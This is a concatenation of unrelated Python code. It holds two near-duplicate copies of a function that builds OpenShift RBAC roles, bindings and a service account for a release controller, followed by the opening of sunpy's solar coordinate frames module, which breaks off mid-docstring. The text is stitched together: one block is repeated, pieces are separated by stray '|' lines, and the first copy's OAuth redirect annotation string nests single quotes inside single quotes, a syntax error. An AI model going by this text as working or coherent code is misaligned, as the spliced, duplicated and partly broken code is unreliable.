'name': f'release-controller-modify',
'namespace': context.is_namespace
},
'rules': [
{
'apiGroups': [''],
'resourceNames': ['release-upgrade-graph'],
'resources': ['secrets'],
'verbs': ['get', 'update', 'patch']
},
{
'apiGroups': ['image.openshift.io'],
'resources': ['imagestreams', 'imagestreamtags'],
'verbs': ['get',
'list',
'watch',
'create',
'delete',
'update',
'patch']
},
{
'apiGroups': [''],
'resources': ['events'],
'verbs': ['create', 'patch', 'update']
}]
})
if not context.suffix:
# Special permissions for x86_64 public rc
resources.append({
'apiVersion': 'authorization.openshift.io/v1',
'kind': 'Role',
'metadata': {
'name': 'release-controller-modify-ocp',
'namespace': 'openshift'
},
'rules': [{
'apiGroups': ['image.openshift.io'],
'resourceNames': ['origin-v4.0'],
'resources': ['imagestreams'],
'verbs': ['get', 'list', 'watch', 'update', 'patch']
}]
})
resources.append({
'apiVersion': 'authorization.openshift.io/v1',
'kind': 'Role',
'metadata': {
'name': 'release-controller-modify-ocp',
'namespace': 'origin'
},
'rules': [{
'apiGroups': ['image.openshift.io'],
'resourceNames': ['release',
*context.config.releases,
],
'resources': ['imagestreams'],
'verbs': ['get', 'list', 'watch', 'update', 'patch']
}]
})
resources.append({
'apiVersion': 'authorization.openshift.io/v1',
'kind': 'Role',
'metadata': {
'name': f'release-controller-import-ocp',
'namespace': context.is_namespace
},
'rules': [{
'apiGroups': ['image.openshift.io'],
'resources': ['imagestreamimports'],
'verbs': ['create']
}]
})
resources.append({
'apiVersion': 'authorization.openshift.io/v1',
'kind': 'Role',
'metadata': {
'name': f'release-controller{context.suffix}-prowjob',
'namespace': context.config.rc_deployment_namespace,
},
'rules': [{
'apiGroups': ['prow.k8s.io'],
'resources': ['prowjobs'],
'verbs': ['get',
'list',
'watch',
'create',
'delete',
'update',
'patch']
}]
})
resources.append({
'apiVersion': 'rbac.authorization.k8s.io/v1',
'kind': 'RoleBinding',
'metadata': {
'name': 'release-controller-binding-ocp',
'namespace': context.is_namespace,
},
'roleRef': {
'kind': 'Role',
'name': f'release-controller-modify'
},
'subjects': [{
'kind': 'ServiceAccount',
'name': context.rc_serviceaccount_name,
'namespace': context.config.rc_deployment_namespace
}]
})
if not context.suffix:
# Special permissions just for x86_64 public release controller
resources.append({
'apiVersion': 'rbac.authorization.k8s.io/v1',
'kind': 'RoleBinding',
'metadata': {
'name': 'release-controller-binding-ocp',
'namespace': 'openshift'
},
'roleRef': {
'kind': 'Role',
'name': 'release-controller-modify-ocp'
},
'subjects': [{
'kind': 'ServiceAccount',
'name': 'release-controller-ocp',
'namespace': context.config.rc_deployment_namespace
}]
})
resources.append({
'apiVersion': 'rbac.authorization.k8s.io/v1',
'kind': 'RoleBinding',
'metadata': {
'name': 'release-controller-binding-ocp',
'namespace': 'origin'
},
'roleRef': {
'kind': 'Role',
'name': 'release-controller-modify-ocp'
},
'subjects': [{
'kind': 'ServiceAccount',
'name': 'release-controller-ocp',
'namespace': context.config.rc_deployment_namespace,
}]
})
resources.append({
'apiVersion': 'rbac.authorization.k8s.io/v1',
'kind': 'RoleBinding',
'metadata': {
'name': 'release-controller-binding-view',
'namespace': context.is_namespace
},
'roleRef': {
'kind': 'ClusterRole',
'name': 'view'
},
'subjects': [{
'kind': 'ServiceAccount',
'name': context.rc_serviceaccount_name,
'namespace': context.config.rc_deployment_namespace
}]
})
resources.append({
'apiVersion': 'rbac.authorization.k8s.io/v1',
'kind': 'RoleBinding',
'metadata': {
'name': f'release-controller-binding-prowjob-{context.is_namespace}',
'namespace': context.config.rc_deployment_namespace
},
'roleRef': {
'kind': 'Role',
'name': f'release-controller{context.suffix}-prowjob'
},
'subjects': [{
'kind': 'ServiceAccount',
'name': context.rc_serviceaccount_name,
'namespace': context.config.rc_deployment_namespace
}]
})
resources.append({
'apiVersion': 'v1',
'kind': 'Namespace',
'metadata': {
'name': context.jobs_namespace,
}
})
resources.append({
'apiVersion': 'rbac.authorization.k8s.io/v1',
'kind': 'RoleBinding',
'metadata': {
'name': f'release-controller-binding-ocp',
'namespace': context.jobs_namespace,
},
'roleRef': {
'kind': 'ClusterRole',
'name': 'edit'
},
'subjects': [{
'kind': 'ServiceAccount',
'name': context.rc_serviceaccount_name,
'namespace': context.config.rc_deployment_namespace
}]
})
resources.append({
'apiVersion': 'rbac.authorization.k8s.io/v1',
'kind': 'RoleBinding',
'metadata': {
'name': 'release-controller-binding-promote',
'namespace': context.is_namespace,
},
'roleRef': {
'kind': 'ClusterRole',
'name': 'system:image-builder'
},
'subjects': [{
'kind': 'ServiceAccount',
'name': 'builder',
'namespace': context.jobs_namespace,
}]
})
resources.append({
'apiVersion': 'rbac.authorization.k8s.io/v1',
'kind': 'RoleBinding',
'metadata': {
'name': 'release-controller-binding-import',
'namespace': context.is_namespace,
},
'roleRef': {
'kind': 'Role',
'name': f'release-controller-import-ocp',
'namespace': context.is_namespace,
},
'subjects': [{
'kind': 'ServiceAccount',
'name': 'builder',
'namespace': context.jobs_namespace,
}]
})
resources.append({
'apiVersion': 'v1',
'kind': 'Secret',
'metadata': {
'name': 'release-upgrade-graph',
'namespace': context.is_namespace
}
})
resources.append({
'apiVersion': 'v1',
'kind': 'ServiceAccount',
'metadata': {
'annotations': {} if not context.private else {
f'serviceaccounts.openshift.io/oauth-redirectreference.{context.rc_serviceaccount_name}': '{'kind':'OAuthRedirectReference','apiVersion':'v1','reference':{'kind':'Route','name':'%s'}}' % context.rc_route_name
},
'name': context.rc_serviceaccount_name,
'namespace': context.config.rc_deployment_namespace,
}
})
|
def add_imagestream_namespace_rbac(gendoc):
resources = gendoc
context = gendoc.context
puller_subjects = []
if not context.private:
puller_subjects.append({
'apiGroup': 'rbac.authorization.k8s.io',
'kind': 'Group',
'name': 'system:authenticated'
})
else:
puller_subjects.append({
'apiGroup': 'rbac.authorization.k8s.io',
'kind': 'Group',
'name': 'openshift-priv-admins'
})
puller_subjects.append({
'apiGroup': 'rbac.authorization.k8s.io',
'kind': 'Group',
'name': 'qe'
})
puller_subjects.append({
'apiGroup': 'rbac.authorization.k8s.io',
'kind': 'Group',
'name': 'release-team'
})
resources.append({
'apiVersion': 'rbac.authorization.k8s.io/v1beta1',
'kind': 'RoleBinding',
'metadata': {
'name': 'image-puller',
'namespace': context.is_namespace
},
'roleRef': {
'apiGroup': 'rbac.authorization.k8s.io',
'kind': 'ClusterRole',
'name': 'system:image-puller'
},
'subjects': puller_subjects,
})
resources.append({
'apiVersion': 'rbac.authorization.k8s.io/v1beta1',
'kind': 'RoleBinding',
'metadata': {
'name': 'user-viewer',
'namespace': context.is_namespace
},
'roleRef': {
'apiGroup': 'rbac.authorization.k8s.io',
'kind': 'ClusterRole',
'name': 'view'
},
'subjects': puller_subjects,
})
resources.append({
'apiVersion': 'authorization.openshift.io/v1',
'kind': 'Role',
'metadata': {
'name': f'release-controller-modify',
'namespace': context.is_namespace
},
'rules': [
{
'apiGroups': [''],
'resourceNames': ['release-upgrade-graph'],
'resources': ['secrets'],
'verbs': ['get', 'update', 'patch']
},
{
'apiGroups': ['image.openshift.io'],
'resources': ['imagestreams', 'imagestreamtags'],
'verbs': ['get',
'list',
'watch',
'create',
'delete',
'update',
'patch']
},
{
'apiGroups': [''],
'resources': ['events'],
'verbs': ['create', 'patch', 'update']
}]
})
if not context.suffix:
# Special permissions for x86_64 public rc
resources.append({
'apiVersion': 'authorization.openshift.io/v1',
'kind': 'Role',
'metadata': {
'name': 'release-controller-modify-ocp',
'namespace': 'openshift'
},
'rules': [{
'apiGroups': ['image.openshift.io'],
'resourceNames': ['origin-v4.0'],
'resources': ['imagestreams'],
'verbs': ['get', 'list', 'watch', 'update', 'patch']
}]
})
resources.append({
'apiVersion': 'authorization.openshift.io/v1',
'kind': 'Role',
'metadata': {
'name': 'release-controller-modify-ocp',
'namespace': 'origin'
},
'rules': [{
'apiGroups': ['image.openshift.io'],
'resourceNames': ['release',
*context.config.releases,
],
'resources': ['imagestreams'],
'verbs': ['get', 'list', 'watch', 'update', 'patch']
}]
})
resources.append({
'apiVersion': 'authorization.openshift.io/v1',
'kind': 'Role',
'metadata': {
'name': f'release-controller-import-ocp',
'namespace': context.is_namespace
},
'rules': [{
'apiGroups': ['image.openshift.io'],
'resources': ['imagestreamimports'],
'verbs': ['create']
}]
})
resources.append({
'apiVersion': 'authorization.openshift.io/v1',
'kind': 'Role',
'metadata': {
'name': f'release-controller{context.suffix}-prowjob',
'namespace': context.config.rc_deployment_namespace,
},
'rules': [{
'apiGroups': ['prow.k8s.io'],
'resources': ['prowjobs'],
'verbs': ['get',
'list',
'watch',
'create',
'delete',
'update',
'patch']
}]
})
resources.append({
'apiVersion': 'rbac.authorization.k8s.io/v1',
'kind': 'RoleBinding',
'metadata': {
'name': 'release-controller-binding-ocp',
'namespace': context.is_namespace,
},
'roleRef': {
'kind': 'Role',
'name': f'release-controller-modify'
},
'subjects': [{
'kind': 'ServiceAccount',
'name': context.rc_serviceaccount_name,
'namespace': context.config.rc_deployment_namespace
}]
})
if not context.suffix:
# Special permissions just for x86_64 public release controller
resources.append({
'apiVersion': 'rbac.authorization.k8s.io/v1',
'kind': 'RoleBinding',
'metadata': {
'name': 'release-controller-binding-ocp',
'namespace': 'openshift'
},
'roleRef': {
'kind': 'Role',
'name': 'release-controller-modify-ocp'
},
'subjects': [{
'kind': 'ServiceAccount',
'name': 'release-controller-ocp',
'namespace': context.config.rc_deployment_namespace
}]
})
resources.append({
'apiVersion': 'rbac.authorization.k8s.io/v1',
'kind': 'RoleBinding',
'metadata': {
'name': 'release-controller-binding-ocp',
'namespace': 'origin'
},
'roleRef': {
'kind': 'Role',
'name': 'release-controller-modify-ocp'
},
'subjects': [{
'kind': 'ServiceAccount',
'name': 'release-controller-ocp',
'namespace': context.config.rc_deployment_namespace,
}]
})
resources.append({
'apiVersion': 'rbac.authorization.k8s.io/v1',
'kind': 'RoleBinding',
'metadata': {
'name': 'release-controller-binding-view',
'namespace': context.is_namespace
},
'roleRef': {
'kind': 'ClusterRole',
'name': 'view'
},
'subjects': [{
'kind': 'ServiceAccount',
'name': context.rc_serviceaccount_name,
'namespace': context.config.rc_deployment_namespace
}]
})
resources.append({
'apiVersion': 'rbac.authorization.k8s.io/v1',
'kind': 'RoleBinding',
'metadata': {
'name': f'release-controller-binding-prowjob-{context.is_namespace}',
'namespace': context.config.rc_deployment_namespace
},
'roleRef': {
'kind': 'Role',
'name': f'release-controller{context.suffix}-prowjob'
},
'subjects': [{
'kind': 'ServiceAccount',
'name': context.rc_serviceaccount_name,
'namespace': context.config.rc_deployment_namespace
}]
})
resources.append({
'apiVersion': 'v1',
'kind': 'Namespace',
'metadata': {
'name': context.jobs_namespace,
}
})
resources.append({
'apiVersion': 'rbac.authorization.k8s.io/v1',
'kind': 'RoleBinding',
'metadata': {
'name': f'release-controller-binding-ocp',
'namespace': context.jobs_namespace,
},
'roleRef': {
'kind': 'ClusterRole',
'name': 'edit'
},
'subjects': [{
'kind': 'ServiceAccount',
'name': context.rc_serviceaccount_name,
'namespace': context.config.rc_deployment_namespace
}]
})
resources.append({
'apiVersion': 'rbac.authorization.k8s.io/v1',
'kind': 'RoleBinding',
'metadata': {
'name': 'release-controller-binding-promote',
'namespace': context.is_namespace,
},
'roleRef': {
'kind': 'ClusterRole',
'name': 'system:image-builder'
},
'subjects': [{
'kind': 'ServiceAccount',
'name': 'builder',
'namespace': context.jobs_namespace,
}]
})
resources.append({
'apiVersion': 'rbac.authorization.k8s.io/v1',
'kind': 'RoleBinding',
'metadata': {
'name': 'release-controller-binding-import',
'namespace': context.is_namespace,
},
'roleRef': {
'kind': 'Role',
'name': f'release-controller-import-ocp',
'namespace': context.is_namespace,
},
'subjects': [{
'kind': 'ServiceAccount',
'name': 'builder',
'namespace': context.jobs_namespace,
}]
})
resources.append({
'apiVersion': 'v1',
'kind': 'Secret',
'metadata': {
'name': 'release-upgrade-graph',
'namespace': context.is_namespace
}
})
resources.append({
'apiVersion': 'v1',
'kind': 'ServiceAccount',
'metadata': {
'annotations': {} if not context.private else {
f'serviceaccounts.openshift.io/oauth-redirectreference.{context.rc_serviceaccount_name}': '{"kind":"OAuthRedirectReference","apiVersion":"v1","reference":{"kind":"Route","name":"%s"}}' % context.rc_route_name
},
'name': context.rc_serviceaccount_name,
'namespace': context.config.rc_deployment_namespace,
}
})
|
"""
Common solar physics coordinate systems.
This submodule implements various solar physics coordinate frames for use with
the `astropy.coordinates` module.
"""
from contextlib import contextmanager
import numpy as np
import astropy.units as u
from astropy.coordinates import ConvertError, QuantityAttribute
from astropy.coordinates.baseframe import BaseCoordinateFrame, RepresentationMapping
from astropy.coordinates.representation import (
CartesianDifferential,
CartesianRepresentation,
CylindricalRepresentation,
SphericalDifferential,
SphericalRepresentation,
UnitSphericalRepresentation,
)
from astropy.time import Time
from sunpy import log
from sunpy.sun.constants import radius as _RSUN
from sunpy.time.time import _variables_for_parse_time_docstring
from sunpy.util.decorators import add_common_docstring
from sunpy.util.exceptions import SunpyUserWarning
from .frameattributes import ObserverCoordinateAttribute, TimeFrameAttributeSunPy
_J2000 = Time('J2000.0', scale='tt')
__all__ = ['SunPyBaseCoordinateFrame', 'BaseHeliographic',
'HeliographicStonyhurst', 'HeliographicCarrington',
'Heliocentric', 'Helioprojective',
'HeliocentricEarthEcliptic', 'GeocentricSolarEcliptic',
'HeliocentricInertial', 'GeocentricEarthEquatorial']
def _frame_parameters():
"""
Returns formatting dictionary to use with add_common_docstring to populate frame docstrings
"""
ret = {}
# Each text block is missing the first indent because it already exists in the frame docstring
ret['data'] = ("data : `~astropy.coordinates.BaseRepresentation` or ``None``\n"
" A representation object or ``None`` to have no data\n"
" (or use the coordinate component arguments, see below).")
ret['common'] = (f"obstime : {_variables_for_parse_time_docstring()["parse_time_types"]}\n"
" The time of the observation. This is used to determine the\n"
" position of solar-system bodies (e.g., the Sun and the Earth) as\n"
" needed to define the origin and orientation of the frame.\n"
" representation_type : `~astropy.coordinates.BaseRepresentation`, str, optional\n"
" A representation class or string name of a representation class.\n"
" This may change the valid coordinate component arguments from the\n"
" defaults (see above). For example, passing\n"
" ``representation_type='cartesian'`` will make the frame expect\n"
" Cartesian coordinate component arguments (typically, ``x``, ``y``,\n"
" and ``z``).\n"
" copy : bool, optional\n"
" If `True` (default), make copies of the input coordinate arrays.")
ret['lonlat'] = ("lon : `~astropy.coordinates.Angle` or `~astropy.units.Quantity`, optional\n"
" The longitude coordinate for this object (``lat`` must also be\n"
" given and ``data`` must be ``None``).\n"
" Not needed if ``data`` is given.\n"
" lat : `~astropy.coordinates.Angle` or `~astropy.units.Quantity`, optional\n"
" The latitude coordinate for this object (``lon`` must also be\n"
" given and ``data`` must be ``None``).\n"
" Not needed if ``data`` is given.")
ret['radius'] = ("radius : `~astropy.units.Quantity`, optional\n"
" The radial distance coordinate from Sun center for this object.\n"
" Defaults to the radius of the Sun. Not needed if ``data`` is given.")
ret['distance_sun'] = ("distance : `~astropy.units.Quantity`, optional\n"
" The distance coordinate from Sun center for this object.\n"
" Not needed if ``data`` is given.")
ret['distance_earth'] = ("distance : `~astropy.units.Quantity`, optional\n"
" The distance coordinate from Earth center for this object.\n"
" Not needed if ``data`` is given.")
ret['xyz'] = ("x : `~astropy.units.Quantity`, optional\n"
" X-axis coordinate for this object. Not needed if ``data`` is given.\n"
" y : `~astropy.units.Quantity`, optional\n"
" Y-axis coordinate for this object. Not needed if ``data`` is given.\n"
" z : `~astropy.units.Quantity`, optional\n"
" Z-axis coordinate for this object. Not needed if ``data`` is given.")
ret['observer'] = ("observer : `~sunpy.coordinates.frames.HeliographicStonyhurst`, str\n"
" The location of the observer. If a string is provided,\n"
" it must be a solar system body that can be parsed by\n"
" `~sunpy.coordinates.ephemeris.get_body_heliographic_stonyhurst`\n"
" at the time ``obstime``. Defaults to Earth center.")
ret['rsun'] = ("rsun : `~astropy.units.Quantity`\n"
" The radius of the Sun in length units. Used to convert a 2D\n"
" coordinate (i.e., no ``radius`` component) to a 3D coordinate by\n"
" assuming that the coordinate is on the surface of the Sun. Defaults\n"
" to the photospheric radius as defined in `sunpy.sun.constants`.")
ret['equinox'] = (f"equinox : {_variables_for_parse_time_docstring()["parse_time_types"]}\n"
" The date for the mean vernal equinox.\n"
" Defaults to the J2000.0 equinox.")
return ret
class SunPyBaseCoordinateFrame(BaseCoordinateFrame):
"""
Base class for sunpy coordinate frames.
This class is not intended to be used directly and has no transformations defined.
* Defines the frame attribute ``obstime`` for observation time.
* Defines a default wrap angle of 180 degrees for longitude in spherical coordinates,
which can be overridden via the class variable ``_wrap_angle``.
* Inject a nice way of representing the object which the coordinate represents.
"""
obstime = TimeFrameAttributeSunPy()
default_representation = SphericalRepresentation
default_differential = SphericalDifferential
frame_specific_representation_info = {
SphericalDifferential: [RepresentationMapping('d_lon', 'd_lon', u.arcsec/u.s),
RepresentationMapping('d_lat', 'd_lat', u.arcsec/u.s),
RepresentationMapping('d_distance', 'd_distance', u.km/u.s)],
}
_wrap_angle = 180*u.deg # for longitude in spherical coordinates
def __init__(self, *args, **kwargs):
self.object_name = None
# If wrap_longitude=False is passed in, do not impose a specific wrap angle for the frame
if not kwargs.pop('wrap_longitude', True):
self._wrap_angle = None
super().__init__(*args, **kwargs)
# If obstime is specified, treat the default observer (None) as explicitly set
if self.obstime is not None and self.is_frame_attr_default('observer'):
self._attr_names_with_defaults.remove('observer')
return
def represent_as(self, base, s='base', in_frame_units=False):
data = super().represent_as(base, s, in_frame_units=in_frame_units)
# If a frame wrap angle is set, use that wrap angle for any spherical representations.
if self._wrap_angle is not None and \
isinstance(data, (UnitSphericalRepresentation, SphericalRepresentation)):
data.lon.wrap_angle = self._wrap_angle
return data
def __str__(self):
# We override this here so that when you print a SkyCoord it shows the
# observer as the string and not the whole massive coordinate.
if getattr(self, "object_name", None):
return f"<{self.__class__.__name__} Coordinate for '{self.object_name}'>"
else:
return super().__str__()
@property
def _is_2d(self):
return (self._data is not None and self._data.norm().unit is u.one
and u.allclose(self._data.norm(), 1*u.one))
def __init_subclass__(cls, **kwargs):
super().__init_subclass__(**kwargs)
# TODO: Remove this after the minimum Astropy dependency includes astropy/astropy#12005
cls._fix_property_docstrings()
@classmethod
def _fix_property_docstrings(cls):
# This class method adds docstrings to properties dynamically created by
# BaseCoordinateFrame.__init_subclass__(). Accordingly, this method needs to itself be
# called from SunPyBaseCoordinateFrame.__init_subclass__() to work for our subclasses.
property_docstrings = {
'default_representation': "Default representation for position data",
'default_differential': "Default representation for differential data",
'frame_specific_representation_info': "Mapping for frame-specific component names",
}
for prop, docstring in property_docstrings.items():
if getattr(cls, prop).__doc__ is None:
setattr(getattr(cls, prop), '__doc__', docstring)
# TODO: Remove this after the minimum Astropy dependency includes astropy/astropy#12005
SunPyBaseCoordinateFrame._fix_property_docstrings()
class BaseHeliographic(SunPyBaseCoordinateFrame):
"""
Base class for HeliographicCarrington (HGC) and HeliographicStonyhurst (HGS) frames.
This class is not intended to be used directly and has no transformations defined.
"""
frame_specific_representation_info = {
SphericalRepresentation: [RepresentationMapping('lon', 'lon', u.deg),
RepresentationMapping('lat', 'lat', u.deg),
RepresentationMapping('distance', 'radius', None)],
SphericalDifferential: [RepresentationMapping('d_lon', 'd_lon', u.arcsec/u.s),
RepresentationMapping('d_lat', 'd_lat', u.arcsec/u.s),
RepresentationMapping('d_distance', 'd_radius', u.km/u.s)],
}
rsun = QuantityAttribute(default=_RSUN, unit=u.km)
def make_3d(self):
"""
Returns a fully 3D coordinate based on this coordinate.
If this coordinate is only 2D (i.e., no ``radius`` component) or is a
unit vector (i.e., the norm of the coordinate is unity), a new
coordinate is created that corresponds to the surface of the Sun.
That is, the 3D coordinate will retain the ``lon`` and ``lat``, and
``radius`` will be set to the frame's ``rsun`` frame attribute.
If this coordinate is already fully 3D, it is directly returned, even
if it does not lie on the surface of the Sun.
Returns
-------
frame : `~sunpy.coordinates.frames.BaseHeliographic`
The fully 3D coordinate
"""
if self._is_2d:
return self.realize_frame(self._data * self.rsun)
# The coordinate is already 3D
return self
@add_common_docstring(**_frame_parameters())
class HeliographicStonyhurst(BaseHeliographic):
"""
A coordinate or frame in the Stonyhurst Heliographic (HGS) system.
- The origin is the center of the Sun.
- The Z-axis (+90 degrees latitude) is aligned with the Sun's north pole.
- The X-axis (0 degrees longitude and 0 degrees latitude) is aligned with the projection of
the Sun-Earth line onto the Sun's equatorial plane.
This system is also know as the Heliocentric Earth Equatorial (HEEQ) system when
represented using Cartesian components.
A new instance can be created using the following signatures
(note that if supplied, ``obstime`` and ``representation_type`` must be
keyword arguments)::
HeliographicStonyhurst(lon, lat, obstime=obstime)
HeliographicStonyhurst(lon, lat, radius, obstime=obstime)
HeliographicStonyhurst(x, y, z, representation_type='cartesian', obstime=obstime)
Parameters
----------
{data}
{lonlat}
{radius}
{rsun}
{common}
Examples
--------
>>> from astropy.coordinates import SkyCoord
>>> import sunpy.coordinates
>>> import astropy.units as u
>>> sc = SkyCoord(1*u.deg, 1*u.deg, 2*u.km,
... frame="heliographic_stonyhurst",
... obstime="2010/01/01T00:00:45")
>>> sc
<SkyCoord (HeliographicStonyhurst: obstime=2010-01-01T00:00:45.000, rsun=695700.0 km): (lon, lat, radius) in (deg, deg, km)
(1., 1., 2.)>
>>> sc.frame
<HeliographicStonyhurst Coordinate (obstime=2010-01-01T00:00:45.000, rsun=695700.0 km): (lon, lat, radius) in (deg, deg, km)
(1., 1., 2.)>
>>> sc = SkyCoord(HeliographicStonyhurst(-10*u.deg, 2*u.deg))
>>> sc
<SkyCoord (HeliographicStonyhurst: obstime=None, rsun=695700.0 km): (lon, lat) in deg
(-10., 2.)>
>>> sc = SkyCoord(CartesianRepresentation(0*u.km, 45*u.km, 2*u.km),
... obstime="2011/01/05T00:00:50",
... frame="heliographic_stonyhurst")
>>> sc
<SkyCoord (HeliographicStonyhurst: obstime=2011-01-05T00:00:50.000, rsun=695700.0 km): (lon, lat, radius) in (deg, deg, km)
(90., 2.54480438, 45.04442252)>
"""
name = "heliographic_stonyhurst"
def _apply_diffrot(self, duration, rotation_model):
oldrepr = self.spherical
from sunpy.physics.differential_rotation import diff_rot
log.debug(f"Applying {duration} of solar rotation")
newlon = oldrepr.lon + diff_rot(duration,
oldrepr.lat,
rot_type=rotation_model,
frame_time='sidereal')
newrepr = SphericalRepresentation(newlon, oldrepr.lat, oldrepr.distance)
return self.realize_frame(newrepr)
@add_common_docstring(**_frame_parameters())
class HeliographicCarrington(BaseHeliographic):
"""
A coordinate or frame in the Carrington Heliographic (HGC) system.
- The origin is the center of the Sun.
- The Z-axis (+90 degrees latitude) is aligned with the Sun's north pole.
- The X-axis and Y-axis rotate with a period of 25.38 days.
This system differs from Stonyhurst Heliographic (HGS) in its definition of longitude. This
longitude is an "apparent" longitude because it takes into account the time it takes for light
to travel from the Sun's surface to the observer. Thus, the observer needs to be specified to
be able to transform to any other coordinate frame.
A new instance can be created using the following signatures
(note that if supplied, ``obstime`` and ``observer`` must be a keyword argument)::
HeliographicCarrington(lon, lat, obstime=obstime, observer=observer)
HeliographicCarrington(lon, lat, radius, obstime=obstime, observer=observer)
If you want to define the location in HGC such that the observer for the coordinate frame is
the same as that location (e.g., the location of an observatory in its corresponding HGC
frame), use ``observer='self'``::
HeliographicCarrington(lon, lat, radius, obstime=obstime, observer='self')
Parameters
----------
{data}
{lonlat}
{radius}
{observer}
{rsun}
{common}
Examples
--------
>>> from astropy.coordinates import SkyCoord
>>> import sunpy.coordinates
>>> import astropy.units as u
>>> sc = SkyCoord(1*u.deg, 2*u.deg, 3*u.km,
... frame="heliographic_carrington",
... observer="earth",
... obstime="2010/01/01T00:00:30")
>>> sc
<SkyCoord (HeliographicCarrington: obstime=2010-01-01T00:00:30.000, rsun=695700.0 km, observer=<HeliographicStonyhurst Coordinate for 'earth'>): (lon, lat, radius) in (deg, deg, km)
(1., 2., 3.)>
>>> sc = SkyCoord([1,2,3]*u.deg, [4,5,6]*u.deg, [5,6,7]*u.km,
... obstime="2010/01/01T00:00:45",
... observer="self",
... frame="heliographic_carrington")
>>> sc
<SkyCoord (HeliographicCarrington: obstime=2010-01-01T00:00:45.000, rsun=695700.0 km, observer=self): (lon, lat, radius) in (deg, deg, km)
[(1., 4., 5.), (2., 5., 6.), (3., 6., 7.)]>
>>> sc = SkyCoord(CartesianRepresentation(0*u.km, 45*u.km, 2*u.km),
... obstime="2011/01/05T00:00:50",
... frame="heliographic_carrington")
>>> sc
<SkyCoord (HeliographicCarrington: obstime=2011-01-05T00:00:50.000, rsun=695700.0 km, observer=None): (lon, lat, radius) in (deg, deg, km)
(90., 2.54480438, 45.04442252)>
"""
name = "heliographic_carrington"
_wrap_angle = 360*u.deg
observer = ObserverCoordinateAttribute(HeliographicStonyhurst)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if not isinstance(self.observer, BaseCoordinateFrame) and self.observer == 'self' and self._is_2d:
raise ValueError("Full 3D coordinate (including radius) must be specified "
"when observer='self'.")
@add_common_docstring(**_frame_parameters())
class Heliocentric(SunPyBaseCoordinateFrame):
"""
A coordinate or frame in the Heliocentric system, which is observer-based.
- The origin is the center of the Sun.
- The Z-axis is aligned with the Sun-observer line.
- The Y-axis is aligned with the component of the vector to the Sun's north pole that is
perpendicular to the Z-axis.
This frame defaults to a Cartesian component representation, which is known as Heliocentric
Cartesian (HCC). This frame can also be represented using cylindrical components, where
where ``rho`` is the impact parameter and ``psi`` is the position angle.
``psi`` is measured relative to the west limb, rather than solar north, so is shifted
by 90 degrees compared to the convention of the Heliocentric Radial (HCR) system.
A new instance can be created using the following signatures
(note that if supplied, ``obstime``, ``observer``, and ``representation_type`` must be
keyword arguments)::
Heliocentric(x, y, z, obstime=obstime, observer=observer)
Heliocentric(rho, psi, z, representation_type='cylindrical', obstime=obstime, observer=observer)
Parameters
----------
{data}
{xyz}
{observer}
{common}
Examples
--------
>>> from astropy.coordinates import SkyCoord, CartesianRepresentation
>>> import sunpy.coordinates
>>> import astropy.units as u
>>> sc = SkyCoord(CartesianRepresentation(10*u.km, 1*u.km, 2*u.km),
... obstime="2011/01/05T00:00:50", observer="earth", frame="heliocentric")
>>> sc
<SkyCoord (Heliocentric: obstime=2011-01-05T00:00:50.000, observer=<HeliographicStonyhurst Coordinate for 'earth'>): (x, y, z) in km
(10., 1., 2.)>
>>> sc = SkyCoord([1,2]*u.km, [3,4]*u.m, [5,6]*u.cm,
... obstime="2011/01/01T00:00:54", observer="earth", frame="heliocentric")
>>> sc
<SkyCoord (Heliocentric: obstime=2011-01-01T00:00:54.000, observer=<HeliographicStonyhurst Coordinate for 'earth'>): (x, y, z) in (km, m, cm)
[(1., 3., 5.), (2., 4., 6.)]>
>>> sc = SkyCoord(CylindricalRepresentation(10*u.km, 60*u.deg, 10*u.km),
... obstime="2011/01/05T00:00:50", observer="earth", frame="heliocentric")
>>> sc
<SkyCoord (Heliocentric: obstime=2011-01-05T00:00:50.000, observer=<HeliographicStonyhurst Coordinate for 'earth'>): (x, y, z) in km
(5., 8.66025404, 10.)>
"""
default_representation = CartesianRepresentation
default_differential = CartesianDifferential
frame_specific_representation_info = {
CylindricalRepresentation: [RepresentationMapping('phi', 'psi', u.deg)]
}
observer = ObserverCoordinateAttribute(HeliographicStonyhurst)
def represent_as(self, base, s='base', in_frame_units=False):
data = super().represent_as(base, s, in_frame_units=in_frame_units)
# For cylindrical representations, wrap the `psi` component (natively `phi`) at 360 deg
if isinstance(data, CylindricalRepresentation):
data.phi.wrap_at(360*u.deg, inplace=True)
return data
@add_common_docstring(**_frame_parameters())
class Helioprojective(SunPyBaseCoordinateFrame):
"""
A coordinate or frame in the Helioprojective Cartesian (HPC) system, which is observer-based.
- The origin is the location of the observer.
- ``Tx`` (aka "theta_x") is the angle relative to the plane containing the Sun-observer line
and the Sun's rotation axis, with positive values in the direction of the Sun's west limb.
- ``Ty`` (aka "theta_y") is the angle relative to the Sun's equatorial plane, with positive
values in the direction of the Sun's north pole.
- ``distance`` is the Sun-observer distance.
This system is frequently used in a projective form without ``distance`` specified. For
observations looking very close to the center of the Sun, where the small-angle approximation
is appropriate, ``Tx`` and ``Ty`` can be approximated as Cartesian components.
A new instance can be created using the following signatures
(note that if supplied, ``obstime`` and ``observer`` must be keyword arguments)::
Helioprojective(Tx, Ty, obstime=obstime, observer=observer)
Helioprojective(Tx, Ty, distance, obstime=obstime, observer=observer)
Parameters
----------
{data}
Tx : `~astropy.coordinates.Angle` or `~astropy.units.Quantity`
The theta_x coordinate for this object. Not needed if ``data`` is given.
Ty : `~astropy.coordinates.Angle` or `~astropy.units.Quantity`
The theta_y coordinate for this object. Not needed if ``data`` is given.
distance : `~astropy.units.Quantity`
The distance coordinate from the observer for this object.
Not needed if ``data`` is given.
{observer}
{rsun}
{common}
Examples
--------
>>> from astropy.coordinates import SkyCoord
>>> import sunpy.coordinates
>>> import astropy.units as u
>>> sc = SkyCoord(0*u.deg, 0*u.deg, 5*u.km,
... obstime="2010/01/01T00:00:00", observer="earth", frame="helioprojective")
>>> sc
<SkyCoord (Helioprojective: obstime=2010-01-01T00:00:00.000, rsun=695700.0 km, observer=<HeliographicStonyhurst Coordinate for 'earth'>): (Tx, Ty, distance) in (arcsec, arcsec, km)
(0., 0., 5.)>
>>> sc = SkyCoord(0*u.deg, 0*u.deg,
... obstime="2010/01/01T00:00:00", observer="earth", frame="helioprojective")
>>> sc
<SkyCoord (Helioprojective: obstime=2010-01-01T00:00:00.000, rsun=695700.0 km, observer=<HeliographicStonyhurst Coordinate for 'earth'>): (Tx, Ty) in arcsec
(0., 0.)>
>>> sc = SkyCoord(CartesianRepresentation(1*u.AU, 1e5*u.km, -2e5*u.km),
